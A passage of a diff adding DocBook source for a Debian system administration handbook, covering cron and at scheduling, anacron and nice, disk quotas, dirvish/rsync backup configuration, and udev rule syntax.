+	replace the first five fields in a <filename>crontab</filename>
+	entry. They correspond to the most classic scheduling
+	options:</para>
+        <itemizedlist>
+          <listitem>
+	    <para><literal>@yearly</literal>: once per year (January 1, at
+	    00:00);</para>
+          </listitem>
+          <listitem>
+	    <para><literal>@monthly</literal>: once per month (the 1st of
+	    the month, at 00:00);</para>
+          </listitem>
+          <listitem>
+	    <para><literal>@weekly</literal>: once per week (Sunday at
+	    00:00);</para>
+          </listitem>
+          <listitem>
+	    <para><literal>@daily</literal>: once per day (at
+	    00:00);</para>
+          </listitem>
+          <listitem>
+	    <para><literal>@hourly</literal>: once per hour (at the
+	    beginning of each hour).</para>
+          </listitem>
+        </itemizedlist>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>SPECIAL CASE</emphasis> <command>cron</command> and daylight savings time</title>
+
+	<para>In Debian, <command>cron</command> takes the time change (for
+	Daylight Savings Time, or in fact for any significant change in the
+	local time) into account as best as it can. Thus, the commands that
+	should have been executed during an hour that never existed (for
+	example, tasks scheduled at 2:30 am during the Spring time change
+	in France, since at 2:00 am the clock jumps directly to 3:00 am)
+	are executed shortly after the time change (thus around 3:00 am
+	DST). On the other hand, in autumn, when commands would be executed
+	several times (2:30 am DST, then an hour later at 2:30 am standard
+	time, since at 3:00 am DST the clock turns back to 2:00 am) are
+	only executed once.</para>
+
+	<para>Be careful, however, if the order in which the different
+	scheduled tasks and the delay between their respective executions
+	matters, you should check the compatibility of these constraints
+	with <command>cron</command>'s behavior; if necessary, you can
+	prepare a special schedule for the two problematic nights per
+	year.</para>
+      </sidebar>
+
+      <para>Each significant line of a <emphasis>crontab</emphasis>
+      describes a scheduled command with the six (or seven) following
+      fields:</para>
+      <itemizedlist>
+        <listitem>
+	  <para>the value for the minute (number from 0 to 59);</para>
+        </listitem>
+        <listitem>
+	  <para>the value for the hour (from 0 to 23);</para>
+        </listitem>
+        <listitem>
+	  <para>the value for the day of the month (from 1 to 31);</para>
+        </listitem>
+        <listitem>
+	  <para>the value for the month (from 1 to 12);</para>
+        </listitem>
+        <listitem>
+	  <para>the value for the day of the week (from 0 to 7, 1
+	  corresponding to Monday, Sunday being represented by both 0 and
+	  7; it is also possible to use the first three letters of the name
+	  of the day of the week in English, such as
+	  <literal>Sun</literal>, <literal>Mon</literal>, etc.);</para>
+        </listitem>
+        <listitem>
+	  <para>the user name under whose identity the command must be
+	  executed (in the <filename>/etc/crontab</filename> file and in
+	  the fragments located in <filename>/etc/cron.d/</filename>, but
+	  not in the users' own crontab files);</para>
+        </listitem>
+        <listitem>
+	  <para>the command to execute (when the conditions defined by the
+	  first five columns are met).</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>All these details are documented in the
+      <citerefentry><refentrytitle>crontab</refentrytitle>
+      <manvolnum>5</manvolnum></citerefentry> man page.</para>
+
+      <para>Each value can be expressed in the form of a list of possible
+      values (separated by commas). The syntax <literal>a-b</literal>
+      describes the interval of all the values between <literal>a</literal>
+      and <literal>b</literal>. The syntax <literal>a-b/c</literal>
+      describes the interval with an increment of <literal>c</literal>
+      (example: <literal>0-10/2</literal> means
+      <literal>0,2,4,6,8,10</literal>). An asterisk <literal>*</literal> is
+      a wildcard, representing all possible values.</para>
+
+      <example id="example.crontab">
+        <title>Sample <filename>crontab</filename> file</title>
+
+        <programlisting>#Format
+#min hour day mon dow  command
+
+# Download data every night at 7:25 pm
+ 25  19   *   *   *    $HOME/bin/get.pl
+
+# 8:00 am, on weekdays (Monday through Friday)
+ 00  08   *   *   1-5  $HOME/bin/dosomething
+
+# Restart the IRC proxy after each reboot
+@reboot /usr/bin/dircproxy
+</programlisting>
+      </example>
+
+      <sidebar>
+        <title><emphasis>TIP</emphasis> Executing a command on boot</title>
+
+	<para>To execute a command a single time, just after booting the
+	computer, you can use the <literal>@reboot</literal> macro (a
+	simple restart of <command>cron</command> does not trigger a
+	command scheduled with <literal>@reboot</literal>). This macro
+	replaces the first five fields of an entry in the
+	<emphasis>crontab</emphasis>.</para>
+      </sidebar>
+
+    <sidebar>
+      <title><emphasis>ALTERNATIVE</emphasis> Emulating <command>cron</command> with <command>systemd</command></title>
+
+      <para>It is possible to emulate part of
+      <command>cron</command>'s behaviour with
+      <command>systemd</command>'s timer mechanism (see <xref linkend="sect.systemd" />).</para>
+    </sidebar>
+
+    </section>
+    <section id="sect.at-command">
+      <title>Using the <command>at</command> Command</title>
+      <indexterm><primary><command>at</command></primary></indexterm>
+
+      <para>The <command>at</command> executes a command at a specified
+      moment in the future. It takes the desired time and date as
+      command-line parameters, and the command to be executed in its
+      standard input. The command will be executed as if it had been
+      entered in the current shell. <command>at</command> even takes care
+      to retain the current environment, in order to reproduce the same
+      conditions when it executes the command. The time is indicated by
+      following the usual conventions: <literal>16:12</literal> or
+      <literal>4:12pm</literal> represents 4:12 pm. The date can be
+      specified in several European and Western formats, including
+      <literal>DD.MM.YY</literal> (<literal>27.07.15</literal> thus
+      representing 27 July 2015), <literal>YYYY-MM-DD</literal> (this same
+      date being expressed as <literal>2015-07-27</literal>),
+      <literal>MM/DD/[CC]YY</literal> (ie., <literal>12/25/15</literal> or
+      <literal>12/25/2015</literal> will be December 25, 2015), or simple
+      <literal>MMDD[CC]YY</literal> (so that <literal>122515</literal> or
+      <literal>12252015</literal> will, likewise, represent December 25,
+      2015). Without it, the command will be executed as soon as the clock
+      reaches the time indicated (the same day, or tomorrow if that time
+      has already passed on the same day). You can also simply write
+      “today” or “tomorrow”, which is self-explanatory.</para>
+
+      <screen>
+<computeroutput>$ </computeroutput><userinput>at 09:00 27.07.15 &lt;&lt;END</userinput>
+<computeroutput>&gt; </computeroutput><userinput>echo "Don't forget to wish a Happy Birthday to Raphaël!" \</userinput>
+<computeroutput>&gt; </computeroutput><userinput>  | mail lolando@debian.org</userinput>
+<computeroutput>&gt; </computeroutput><userinput>END</userinput>
+<computeroutput>warning: commands will be executed using /bin/sh
+job 31 at Mon Jul 27 09:00:00 2015</computeroutput>
+</screen>
+
+      <para>An alternative syntax postpones the execution for a given
+      duration: <command>at now + <replaceable>number</replaceable>
+      <replaceable>period</replaceable></command>. The
+      <replaceable>period</replaceable> can be <literal>minutes</literal>,
+      <literal>hours</literal>, <literal>days</literal>, or
+      <literal>weeks</literal>. The <replaceable>number</replaceable>
+      simply indicates the number of said units that must elapse before
+      execution of the command.</para>
+
+      <para>To cancel a task scheduled by <command>cron</command>, simply
+      run <command>crontab -e</command> and delete the corresponding line
+      in the <emphasis>crontab</emphasis> file. For <command>at</command>
+      tasks, it is almost as easy: run <command>atrm
+      <replaceable>task-number</replaceable></command>. The task number is
+      indicated by the <command>at</command> command when you scheduled it,
+      but you can find it again with the <command>atq</command> command,
+      which gives the current list of scheduled tasks.</para>
+      <indexterm><primary><command>atrm</command></primary></indexterm>
+      <indexterm><primary><command>atq</command></primary></indexterm>
+    </section>
+  </section>
+  <section id="sect.asynchronous-task-scheduling-anacron">
+    <title>Scheduling Asynchronous Tasks: <command>anacron</command></title>
+
+    <para><command>anacron</command> is the daemon that completes
+    <command>cron</command> for computers that are not on at all times.
+    Since regular tasks are usually scheduled for the middle of the night,
+    they will never be executed if the computer is off at that time. The
+    purpose of <command>anacron</command> is to execute them, taking into
+    account periods in which the computer is not working.</para>
+    <indexterm><primary><command>anacron</command></primary></indexterm>
+
+    <para>Please note that <command>anacron</command> will frequently
+    execute such activity a few minutes after booting the machine, which
+    can render the computer less responsive. This is why the tasks in the
+    <filename>/etc/anacrontab</filename> file are started with the
+    <command>nice</command> command, which reduces their execution priority
+    and thus limits their impact on the rest of the system. Beware, the
+    format of this file is not the same as that of
+    <filename>/etc/crontab</filename>; if you have particular needs for
+    <command>anacron</command>, see the
+    <citerefentry><refentrytitle>anacrontab</refentrytitle>
+    <manvolnum>5</manvolnum></citerefentry> manual page.</para>
+
+    <sidebar>
+      <title><emphasis>BACK TO BASICS</emphasis> Priorities and <command>nice</command></title>
+
+      <para>Unix systems (and thus Linux) are multi-tasking and multi-user
+      systems. Indeed, several processes can run in parallel, and be owned
+      by different users: the kernel mediates access to the resources
+      between the different processes. As a part of this task, it has a
+      concept of priority, which allows it to favor certain processes over
+      others, as needed. When you know that a process can run in low
+      priority, you can indicate so by running it with <command>nice
+      <replaceable>program</replaceable></command>. The program will then
+      have a smaller share of the CPU, and will have a smaller impact on
+      other running processes. Of course, if no other processes needs to
+      run, the program will not be artificially held back.</para>
+
+      <para><command>nice</command> works with levels of “niceness”:
+      the positive levels (from 1 to 19) progressively lower the priority,
+      while the negative levels (from -1 to -20) will increase it — but
+      only root can use these negative levels. Unless otherwise indicated
+      (see the <citerefentry><refentrytitle>nice</refentrytitle>
+      <manvolnum>1</manvolnum></citerefentry> manual page),
+      <command>nice</command> increases the current level by 10.</para>
+
+      <para>If you discover that an already running task should have been
+      started with <command>nice</command> it is not too late to fix it;
+      the <command>renice</command> command changes the priority of an
+      already running process, in either direction (but reducing the
+      “niceness” of a process is reserved for the root user).</para>
+    </sidebar>
+
+    <para>Installation of the <emphasis role="pkg">anacron</emphasis>
+    package deactivates execution by <command>cron</command> of the scripts
+    in the <filename>/etc/cron.hourly/</filename>,
+    <filename>/etc/cron.daily/</filename>,
+    <filename>/etc/cron.weekly/</filename>, and
+    <filename>/etc/cron.monthly/</filename> directories. This avoids their
+    double execution by <command>anacron</command> and
+    <command>cron</command>. The <command>cron</command> command remains
+    active and will continue to handle the other scheduled tasks
+    (especially those scheduled by users).</para>
+  </section>
+  <section id="sect.quotas">
+    <title>Quotas</title>
+    <indexterm><primary>quota</primary></indexterm>
+
+    <para>The quota system allows limiting disk space allocated to a user
+    or group of users. To set it up, you must have a kernel that supports
+    it (compiled with the <varname>CONFIG_QUOTA</varname> option) — as is
+    the case with Debian kernels. The quota management software is found in
+    the <emphasis role="pkg">quota</emphasis> Debian package.</para>
+
+    <para>To activate quota in a filesystem, you have to indicate the
+    <literal>usrquota</literal> and <literal>grpquota</literal> options in
+    <filename>/etc/fstab</filename> for the user and group quotas,
+    respectively. Rebooting the computer will then update the quotas in the
+    absence of disk activity (a necessary condition for proper accounting
+    of already used disk space).</para>
+
+    <para>The <command>edquota <replaceable>user</replaceable></command>
+    (or <command>edquota -g <replaceable>group</replaceable></command>)
+    command allows you to change the limits while examining current disk
+    space usage.</para>
+    <indexterm><primary><command>edquota</command></primary></indexterm>
+
+    <sidebar>
+      <title><emphasis>GOING FURTHER</emphasis> Defining quotas with a script</title>
+      <indexterm><primary><command>setquota</command></primary></indexterm>
+
+      <para>The <command>setquota</command> program can be used in a script
+      to automatically change many quotas. Its
+      <citerefentry><refentrytitle>setquota</refentrytitle>
+      <manvolnum>8</manvolnum></citerefentry> manual page details the
+      syntax to use.</para>
+    </sidebar>
+
+    <para>The quota system allows you to set four limits:</para>
+    <itemizedlist>
+      <listitem>
+	<para>two limits (called “soft” and “hard”) refer to the
+	number of blocks consumed. If the filesystem was created with a
+	block-size of 1 kibibyte, a block contains 1024 bytes from the
+	same file. Unsaturated blocks thus induce losses of disk space. A
+	quota of 100 blocks, which theoretically allows storage of 102,400
+	bytes, will however be saturated with just 100 files of 500 bytes
+	each, only representing 50,000 bytes in total.</para>
+      </listitem>
+      <listitem>
+	<para>two limits (soft and hard) refer to the number of inodes
+	used. Each file occupies at least one inode to store information
+	about it (permissions, owner, timestamp of last access, etc.). It
+	is thus a limit on the number of user files.</para>
+      </listitem>
+    </itemizedlist>
+
+    <para>A “soft” limit can be temporarily exceeded; the user will
+    simply be warned that they are exceeding the quota by the
+    <command>warnquota</command> command, which is usually invoked by
+    <command>cron</command>. A “hard” limit can never be exceeded: the
+    system will refuse any operation that will cause a hard quota to be
+    exceeded.</para>
+
+    <sidebar>
+      <title><emphasis>VOCABULARY</emphasis> Blocks and inodes</title>
+      <indexterm><primary>block (disk)</primary></indexterm>
+      <indexterm><primary>inode</primary></indexterm>
+
+      <para>The filesystem divides the hard drive into blocks — small
+      contiguous areas. The size of these blocks is defined during creation
+      of the filesystem, and generally varies between 1 and 8
+      kibibytes.</para>
+
+      <para>A block can be used either to store the real data of a file, or
+      for meta-data used by the filesystem. Among this meta-data, you will
+      especially find the inodes. An inode uses a block on the hard drive
+      (but this block is not taken into consideration in the block quota,
+      only in the inode quota), and contains both the information on the
+      file to which it corresponds (name, owner, permissions, etc.) and the
+      pointers to the data blocks that are actually used. For very large
+      files that occupy more blocks than it is possible to reference in a
+      single inode, there is an indirect block system; the inode references
+      a list of blocks that do not directly contain data, but another list
+      of blocks.</para>
+    </sidebar>
+    <indexterm><primary><command>warnquota</command></primary></indexterm>
+
+    <para>With the <command>edquota -t</command> command, you can define a
+    maximum authorized “grace period” within which a soft limit may be
+    exceeded. After this period, the soft limit will be treated like a
+    hard limit, and the user will have to reduce their disk space usage to
+    within this limit in order to be able to write anything to the hard
+    drive.</para>
+
+    <sidebar>
+      <title><emphasis>GOING FURTHER</emphasis> Setting up a default quota for new users</title>
+
+      <para>To automatically setup a quota for new users, you have to
+      configure a template user (with <command>edquota</command> or
+      <command>setquota</command>) and indicate their user name in the
+      <varname>QUOTAUSER</varname> variable in the
+      <filename>/etc/adduser.conf</filename> file. This quota configuration
+      will then be automatically applied to each new user created with the
+      <command>adduser</command> command.</para>
+    </sidebar>
+  </section>
+  <section id="sect.backup">
+    <title>Backup</title>
+
+    <para>Making backups is one of the main responsibilities of any
+    administrator, but it is a complex subject, involving powerful tools
+    which are often difficult to master.</para>
+    <indexterm><primary>backup</primary></indexterm>
+    <indexterm><primary>restoration</primary></indexterm>
+
+    <para>Many programs exist, such as <command>amanda</command>,
+    <command>bacula</command>, <command>BackupPC</command>. Those
+    are client/server system featuring many options, whose configuration is
+    rather difficult. Some of them provide user-friendly web interfaces
+    to mitigate this. But Debian contains dozens of other
+    backup software covering all possible use cases, as you can easily confirm
+    with <command>apt-cache search backup</command>.</para>
+    <indexterm><primary><command>amanda</command></primary></indexterm>
+    <indexterm><primary><command>bacula</command></primary></indexterm>
+    <indexterm><primary><command>BackupPC</command></primary></indexterm>
+
+    <para>Rather than detailing some of them, this section will present the
+    thoughts of the Falcot Corp administrators when they defined their
+    backup strategy.</para>
+
+    <para>At Falcot Corp, backups have two goals: recovering erroneously
+    deleted files, and quickly restoring any computer (server or desktop)
+    whose hard drive has failed.</para>
+    <section>
+      <title>Backing Up with <command>rsync</command></title>
+
+      <para>Backups on tape having been deemed too slow and costly, data
+      will be backed up on hard drives on a dedicated server, on which the
+      use of software RAID (see <xref linkend="sect.raid-soft" />) will
+      protect the data from hard drive failure. Desktop computers are not
+      backed up individually, but users are advised that their personal
+      account on their department's file server will be backed up. The
+      <command>rsync</command> command (from the package of the same name)
+      is used daily to back up these different servers.</para>
+      <indexterm><primary><command>rsync</command></primary></indexterm>
+
+      <sidebar>
+        <title><emphasis>BACK TO BASICS</emphasis> The hard link, a second name for the file</title>
+        <indexterm><primary>link</primary><secondary>hard link</secondary></indexterm>
+        <indexterm><primary>hard link</primary></indexterm>
+
+	<para>A hard link, as opposed to a symbolic link, cannot be
+	differentiated from the linked file. Creating a hard link is
+	essentially the same as giving an existing file a second name. This
+	is why the deletion of a hard link only removes one of the names
+	associated with the file. As long as another name is still assigned
+	to the file, the data therein remain present on the filesystem. It
+	is interesting to note that, unlike a copy, the hard link does not
+	take up additional space on the hard drive.</para>
+
+	<para>A hard link is created with the <command>ln
+	<replaceable>target</replaceable>
+	<replaceable>link</replaceable></command> command. The
+	<replaceable>link</replaceable> file is then a new name for the
+	<replaceable>target</replaceable> file. Hard links can only be
+	created on the same filesystem, while symbolic links are not
+	subject to this limitation.</para>
+      </sidebar>
+
+      <para>The available hard drive space prohibits implementation of a
+      complete daily backup. As such, the <command>rsync</command> command
+      is preceded by a duplication of the content of the previous backup
+      with hard links, which prevents usage of too much hard drive space.
+      The <command>rsync</command> process then only replaces files that
+      have been modified since the last backup. With this mechanism a great
+      number of backups can be kept in a small amount of space. Since all
+      backups are immediately available and accessible (for example, in
+      different directories of a given share on the network), you can
+      quickly make comparisons between two given dates.</para>
+      <indexterm><primary>copy, backup copy</primary></indexterm>
+      <indexterm><primary>backup</primary><secondary>copy</secondary></indexterm>
+      <indexterm><primary><emphasis role="pkg">dirvish</emphasis></primary></indexterm>
+
+      <para>This backup mechanism is easily implemented with the
+      <command>dirvish</command> program. It uses a backup storage space
+      (“bank” in its vocabulary) in which it places timestamped copies
+      of sets of backup files (these sets are called “vaults” in the
+      dirvish documentation).</para>
+
+      <para>The main configuration is in the
+      <filename>/etc/dirvish/master.conf</filename> file. It defines the
+      location of the backup storage space, the list of “vaults” to
+      manage, and default values for expiration of the backups. The rest of
+      the configuration is located in the
+      <filename><replaceable>bank</replaceable>/<replaceable>vault</replaceable>/dirvish/default.conf</filename>
+      files and contains the specific configuration for the corresponding
+      set of files.</para>
+
+      <example id="example.dirvish-master">
+        <title>The <filename>/etc/dirvish/master.conf</filename> file</title>
+
+        <programlisting>bank:
+    /backup
+exclude:
+    lost+found/
+    core
+    *~
+Runall:
+    root    22:00
+expire-default: +15 days
+expire-rule:
+#   MIN HR    DOM MON       DOW  STRFTIME_FMT
+    *   *     *   *         1    +3 months
+    *   *     1-7 *         1    +1 year
+    *   *     1-7 1,4,7,10  1
+</programlisting>
+      </example>
+
+      <para>The <literal>bank</literal> setting indicates the directory in
+      which the backups are stored. The <literal>exclude</literal> setting
+      allows you to indicate files (or file types) to exclude from the
+      backup. The <literal>Runall</literal> is a list of file sets to
+      backup with a time-stamp for each set, which allows you to assign the
+      correct date to the copy, in case the backup is not triggered at
+      precisely the assigned time. You have to indicate a time just before
+      the actual execution time (which is, by default, 10:04 pm in Debian,
+      according to <filename>/etc/cron.d/dirvish</filename>). Finally, the
+      <literal>expire-default</literal> and <literal>expire-rule</literal>
+      settings define the expiration policy for backups. The above example
+      keeps forever backups that are generated on the first Sunday of each
+      quarter, deletes after one year those from the first Sunday of each
+      month, and after 3 months those from other Sundays. Other daily
+      backups are kept for 15 days. The order of the rules does matter,
+      Dirvish uses the last matching rule, or the
+      <literal>expire-default</literal> one if no other
+      <literal>expire-rule</literal> matches.</para>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Scheduled expiration</title>
+
+	<para>The expiration rules are not used by
+	<command>dirvish-expire</command> to do its job. In reality, the
+	expiration rules are applied when creating a new backup copy to
+	define the expiration date associated with that copy.
+	<command>dirvish-expire</command> simply peruses the stored copies
+	and deletes those for which the expiration date has passed.</para>
+      </sidebar>
+
+      <example id="example.dirvish-vault">
+        <title>The <filename>/backup/root/dirvish/default.conf</filename> file</title>
+
+        <programlisting>client: rivendell.falcot.com
+tree: /
+xdev: 1
+index: gzip
+image-default: %Y%m%d
+exclude:
+    /var/cache/apt/archives/*.deb
+    /var/cache/man/**
+    /tmp/**
+    /var/tmp/**
+    *.bak
+</programlisting>
+      </example>
+
+      <para>The above example specifies the set of files to back up: these
+      are files on the machine <emphasis>rivendell.falcot.com</emphasis>
+      (for local data backup, simply specify the name of the local machine
+      as indicated by <command>hostname</command>), especially those in the
+      root tree (<literal>tree: /</literal>), except those listed in
+      <literal>exclude</literal>. The backup will be limited to the
+      contents of one filesystem (<literal>xdev: 1</literal>). It will not
+      include files from other mount points. An index of saved files will
+      be generated (<literal>index: gzip</literal>), and the image will be
+      named according to the current date (<literal>image-default:
+      %Y%m%d</literal>).</para>
+
+      <para>There are many options available, all documented in the
+      <citerefentry><refentrytitle>dirvish.conf</refentrytitle><manvolnum>5</manvolnum></citerefentry>
+      manual page. Once these configuration files are setup, you have to
+      initialize each file set with the <command>dirvish --vault
+      <replaceable>vault</replaceable> --init</command> command. From there
+      on the daily invocation of <command>dirvish-runall</command> will
+      automatically create a new backup copy just after having deleted
+      those that expired.</para>
+
+      <sidebar>
+        <title><emphasis>IN PRACTICE</emphasis> Remote backup over SSH</title>
+
+	<para>When dirvish needs to save data to a remote machine, it will
+	use <command>ssh</command> to connect to it, and will start
+	<command>rsync</command> as a server. This requires the root user
+	to be able to automatically connect to it. The use of an SSH
+	authentication key allows precisely that (see <xref linkend="sect.ssh-key-based-auth" />).</para>
+      </sidebar>
+    </section>
+    <section>
+      <title>Restoring Machines without Backups</title>
+
+      <para>Desktop computers, which are not backed up, will be easy to
+      reinstall from custom DVD-ROMs prepared with <emphasis>Simple-CDD</emphasis>
+      (see <xref linkend="sect.simple-cdd" />). Since this performs
+      an installation from scratch, it loses any customization that can have
+      been made after the initial installation. This is fine since
+      the systems are all hooked to a central LDAP directory for
+      accounts and most desktop applications are preconfigured
+      thanks to dconf (see <xref linkend="sect.gnome-desktop" />
+      for more information about this).</para>
+
+      <para>The Falcot Corp administrators are aware of the limits in their
+      backup policy. Since they can't protect the backup server as well as
+      a tape in a fireproof safe, they have installed it in a separate room
+      so that a disaster such as a fire in the server room won't destroy
+      backups along with everything else. Furthermore, they do an
+      incremental backup on DVD-ROM once per week — only files that have
+      been modified since the last backup are included.</para>
+
+      <sidebar>
+        <title><emphasis>GOING FURTHER</emphasis> Backing up SQL and LDAP services</title>
+
+	<para>Many services (such as SQL or LDAP databases) cannot be
+	backed up by simply copying their files (unless they are properly
+	interrupted during creation of the backups, which is frequently
+	problematic, since they are intended to be available at all times).
+	As such, it is necessary to use an “export” mechanism to create
+	a “data dump” that can be safely backed up. These are often
+	quite large, but they compress well. To reduce the storage space
+	required, you will only store a complete text file per week, and a
+	<command>diff</command> each day, which is created with a command
+	of the type <command>diff
+	<replaceable>file_from_yesterday</replaceable>
+	<replaceable>file_from_today</replaceable></command>. The
+	<command>xdelta</command> program produces incremental differences
+	from binary dumps.</para>
+        <indexterm><primary><command>xdelta</command></primary></indexterm>
+        <indexterm><primary><command>diff</command></primary></indexterm>
+        <indexterm><primary>dump</primary></indexterm>
+      </sidebar>
+
+      <sidebar>
+        <title><emphasis>CULTURE</emphasis> <emphasis>TAR</emphasis>, the standard for tape backups</title>
+        <indexterm><primary>backup</primary><secondary>on tape</secondary></indexterm>
+        <indexterm><primary>tape, backup</primary></indexterm>
+        <indexterm><primary>TAR</primary></indexterm>
+
+	<para>Historically, the simplest means of making a backup on Unix
+	was to store a <emphasis>TAR</emphasis> archive on a tape. The
+	<command>tar</command> command even got its name from “Tape
+	ARchive”.</para>
+      </sidebar>
+    </section>
+  </section>
+  <section id="sect.hotplug">
+    <title>Hot Plugging: <emphasis>hotplug</emphasis></title>
+    <section>
+      <title>Introduction</title>
+
+      <para>The <emphasis>hotplug</emphasis> kernel subsystem dynamically
+      handles the addition and removal of devices, by loading the appropriate
+      drivers and by creating the corresponding device files (with the
+      help of <command>udevd</command>). With modern hardware and virtualization,
+      almost everything can be hotplugged: from the usual USB/PCMCIA/IEEE 1394
+      peripherals to SATA hard drives, but also the CPU and the memory.</para>
+
+      <para>The kernel has a database that associates each device ID
+      with the required driver. This database is used during boot to load
+      all the drivers for the peripheral devices detected on the different
+      buses, but also when an additional hotplug device is
+      connected. Once the device is ready for use, a message is sent to
+      <command>udevd</command> so it will be able to create the
+      corresponding entry in <filename>/dev/</filename>.</para>
+
+      <indexterm><primary><emphasis>hotplug</emphasis></primary></indexterm>
+      <indexterm><primary>hotplug</primary></indexterm>
+      <indexterm><primary>USB</primary></indexterm>
+      <indexterm><primary>IEEE 1394</primary></indexterm>
+      <indexterm><primary>PCMCIA</primary></indexterm>
+      <indexterm><primary>SATA</primary></indexterm>
+    </section>
+    <section>
+      <title>The Naming Problem</title>
+
+      <para>Before the appearance of hotplug connections, it was easy to
+      assign a fixed name to a device. It was based simply on the position
+      of the devices on their respective bus. But this is not possible when
+      such devices can come and go on the bus. The typical case is the use
+      of a digital camera and a USB key, both of which appear to the
+      computer as disk drives. The first one connected may be
+      <filename>/dev/sdb</filename> and the second
+      <filename>/dev/sdc</filename> (with <filename>/dev/sda</filename>
+      representing the computer's own hard drive). The device name is not
+      fixed; it depends on the order in which devices are connected.</para>
+
+      <para>Additionally, more and more drivers use dynamic values for
+      devices' major/minor numbers, which makes it impossible to have
+      static entries for the given devices, since these essential
+      characteristics may vary after a reboot.</para>
+
+      <para><emphasis>udev</emphasis> was created precisely to solve this
+      problem.</para>
+    </section>
+    <section>
+      <title>How <emphasis>udev</emphasis> Works</title>
+
+      <para>When <emphasis>udev</emphasis> is notified by the kernel of the
+      appearance of a new device, it collects various information on the
+      given device by consulting the corresponding entries in
+      <filename>/sys/</filename>, especially those that uniquely identify
+      it (MAC address for a network card, serial number for some USB
+      devices, etc.).</para>
+
+      <para>Armed with all of this information, <emphasis>udev</emphasis>
+      then consults all of the rules contained in
+      <filename>/etc/udev/rules.d/</filename> and
+      <filename>/lib/udev/rules.d/</filename>. In this process it decides
+      how to name the device, what symbolic links to create (to give it
+      alternative names), and what commands to execute. All of these files
+      are consulted, and the rules are all evaluated sequentially (except
+      when a file uses “GOTO” directives). Thus, there may be several
+      rules that correspond to a given event.</para>
+
+      <para>The syntax of rules files is quite simple: each row contains
+      selection criteria and variable assignments. The former are used to
+      select events for which there is a need to react, and the latter
+      defines the action to take. They are all simply separated with
+      commas, and the operator implicitly differentiates between a
+      selection criterion (with comparison operators, such as
+      <literal>==</literal> or <literal>!=</literal>) or an assignment
+      directive (with operators such as <literal>=</literal>,
+      <literal>+=</literal> or <literal>:=</literal>).</para>
+
+      <para>Comparison operators are used on the following
+      variables:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>KERNEL</literal>: the name that the kernel assigns
+	  to the device;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>ACTION</literal>: the action corresponding to the
+	  event (“add” when a device has been added, “remove” when
+	  it has been removed);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>DEVPATH</literal>: the path of the device's
+	  <filename>/sys/</filename> entry;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>SUBSYSTEM</literal>: the kernel subsystem which
+	  generated the request (there are many, but a few examples are
+	  “usb”, “ide”, “net”, “firmware”, etc.);</para>
+        </listitem>
+        <listitem>
+	  <para><literal>ATTR{<replaceable>attribute</replaceable>}</literal>:
+	  file contents of the <replaceable>attribute</replaceable> file in
+	  the
+	  <filename>/sys/<replaceable>$devpath</replaceable>/</filename>
+	  directory of the device. This is where you find the MAC address
+	  and other bus specific identifiers;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>KERNELS</literal>, <literal>SUBSYSTEMS</literal>
+	  and
+	  <literal>ATTRS{<replaceable>attributes</replaceable>}</literal>
+	  are variations that will try to match the different options on
+	  one of the parent devices of the current device;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>PROGRAM</literal>: delegates the test to the
+	  indicated program (true if it returns 0, false if not). The
+	  content of the program's standard output is stored so that it can
+	  be reused by the <literal>RESULT</literal> test;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>RESULT</literal>: execute tests on the standard
+	  output stored during the last call to
+	  <literal>PROGRAM</literal>.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>The right operands can use pattern expressions to match several
+      values at the same time. For instance, <literal>*</literal> matches
+      any string (even an empty one); <literal>?</literal> matches any
+      character, and <literal>[]</literal> matches the set of characters
+      listed between the square brackets (or the opposite thereof if the
+      first character is an exclamation point, and contiguous ranges of
+      characters are indicated like <literal>a-z</literal>).</para>
+
+      <para>Regarding the assignment operators, <literal>=</literal>
+      assigns a value (and replaces the current value); in the case of a
+      list, it is emptied and contains only the value assigned.
+      <literal>:=</literal> does the same, but prevents later changes to
+      the same variable. As for <literal>+=</literal>, it adds an item to a
+      list. The following variables can be changed:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>NAME</literal>: the device filename to be created
+	  in <filename>/dev/</filename>. Only the first assignment counts;
+	  the others are ignored;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>SYMLINK</literal>: the list of symbolic links that
+	  will point to the same device;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>OWNER</literal>, <literal>GROUP</literal> and
+	  <literal>MODE</literal> define the user and group that owns the
+	  device, as well as the associated permission;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>RUN</literal>: the list of programs to execute in
+	  response to this event.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>The values assigned to these variables may use a number of
+      substitutions:</para>
+      <itemizedlist>
+        <listitem>
+	  <para><literal>$kernel</literal> or <literal>%k</literal>:
+	  equivalent to <literal>KERNEL</literal>;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>$number</literal> or <literal>%n</literal>: the
+	  order number of the device, for example, for
+	  <literal>sda3</literal>, it would be “3”;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>$devpath</literal> or <literal>%p</literal>:
+	  equivalent to <literal>DEVPATH</literal>;</para>
+        </listitem>
+        <listitem>
+	 
+	  <para><literal>$attr{<replaceable>attribute</replaceable>}</literal>
+	  or <literal>%s{<replaceable>attribute</replaceable>}</literal>:
+	  equivalent to
+	  <literal>ATTRS{<replaceable>attribute</replaceable>}</literal>;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>$major</literal> or <literal>%M</literal>: the
+	  kernel major number of the device;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>$minor</literal> or <literal>%m</literal>: the
+	  kernel minor number of the device;</para>
+        </listitem>
+        <listitem>
+	  <para><literal>$result</literal> or <literal>%c</literal>: the
+	  string output by the last program invoked by
+	  <literal>PROGRAM</literal>;</para>
+        </listitem>
+        <listitem>
+	  <para>and, finally, <literal>%%</literal> and
+	  <literal>$$</literal> for the percent and dollar sign,
+	  respectively.</para>
+        </listitem>
+      </itemizedlist>
+
+      <para>The above lists are not complete (they include only the most
+      important parameters), but the
+      <citerefentry><refentrytitle>udev</refentrytitle><manvolnum>7</manvolnum></citerefentry>
+      manual page should be exhaustive.</para>
+    </section>
+    <section>
+      <title>A concrete example</title>
+
